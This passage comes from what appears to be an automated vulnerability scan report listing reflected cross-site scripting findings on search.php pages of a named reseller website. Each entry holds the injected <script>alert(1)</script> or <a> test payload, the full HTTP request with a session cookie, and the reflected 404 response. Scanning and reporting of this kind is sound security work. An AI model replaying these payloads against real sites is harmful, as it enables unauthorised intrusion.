Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/search.phpef6ff<script>alert(1)</script>5671a85ec27?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3060. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 689f2<a>47c8e60410d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search689f2<a>47c8e60410d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search689f2<a>47c8e60410d&opt=2 was not found on this server.</p>
...[SNIP]...

2.3061. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bbb7f<a>be6485715f6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/search.php?keyword=search...bbb7f<a>be6485715f6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/search.php?keyword=search...bbb7f<a>be6485715f6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3062. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3eaee<script>alert(1)</script>95da6a55448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&3eaee<script>alert(1)</script>95da6a55448=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&3eaee<script>alert(1)</script>95da6a55448=1 was not found on this server.</p>
...[SNIP]...

2.3063. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a9180<a>0eae71e8750 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2a9180<a>0eae71e8750 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2a9180<a>0eae71e8750 was not found on this server.</p>
...[SNIP]...

2.3064. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f3d8<script>alert(1)</script>f3027c7dc59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4f3d8<script>alert(1)</script>f3027c7dc59/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4f3d8<script>alert(1)</script>f3027c7dc59/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3065. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9a7fc<script>alert(1)</script>b69c293f883 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/429a7fc<script>alert(1)</script>b69c293f883/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/429a7fc<script>alert(1)</script>b69c293f883/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3066. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f169a<script>alert(1)</script>1bb6dd4ee99 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themesf169a<script>alert(1)</script>1bb6dd4ee99/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themesf169a<script>alert(1)</script>1bb6dd4ee99/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3067. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b788a<script>alert(1)</script>5998369b556 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmosb788a<script>alert(1)</script>5998369b556/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmosb788a<script>alert(1)</script>5998369b556/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3068. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1a4a7<script>alert(1)</script>26224587252 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/search.php1a4a7<script>alert(1)</script>26224587252?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/search.php1a4a7<script>alert(1)</script>26224587252?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3069. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1e795<a>53bf2c703e4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search1e795<a>53bf2c703e4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search1e795<a>53bf2c703e4&opt=2 was not found on this server.</p>
...[SNIP]...

2.3070. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f0dc8<a>38b01ca5f83 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/search.php?keyword=search...f0dc8<a>38b01ca5f83&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/search.php?keyword=search...f0dc8<a>38b01ca5f83&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3071. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ea36<script>alert(1)</script>db6244ad522 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&4ea36<script>alert(1)</script>db6244ad522=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&4ea36<script>alert(1)</script>db6244ad522=1 was not found on this server.</p>
...[SNIP]...

2.3072. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e7126<a>fda633da431 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2e7126<a>fda633da431 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2e7126<a>fda633da431 was not found on this server.</p>
...[SNIP]...

2.3073. http://www.resellerbase.com/detail/42/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e3ec<script>alert(1)</script>3be950208a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1e3ec<script>alert(1)</script>3be950208a8/42/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1e3ec<script>alert(1)</script>3be950208a8/42/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3074. http://www.resellerbase.com/detail/42/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 846a7<script>alert(1)</script>b32c0b46b6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42846a7<script>alert(1)</script>b32c0b46b6f/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42846a7<script>alert(1)</script>b32c0b46b6f/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3075. http://www.resellerbase.com/detail/42/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7db9<script>alert(1)</script>f22d3aec3a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themesb7db9<script>alert(1)</script>f22d3aec3a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themesb7db9<script>alert(1)</script>f22d3aec3a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3076. http://www.resellerbase.com/detail/42/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b236c<script>alert(1)</script>eddea815066 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/search.phpb236c<script>alert(1)</script>eddea815066?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/search.phpb236c<script>alert(1)</script>eddea815066?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3077. http://www.resellerbase.com/detail/42/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 84d79<a>1d5c65d3655 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/search.php?keyword=search...&Submit3=Search84d79<a>1d5c65d3655&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
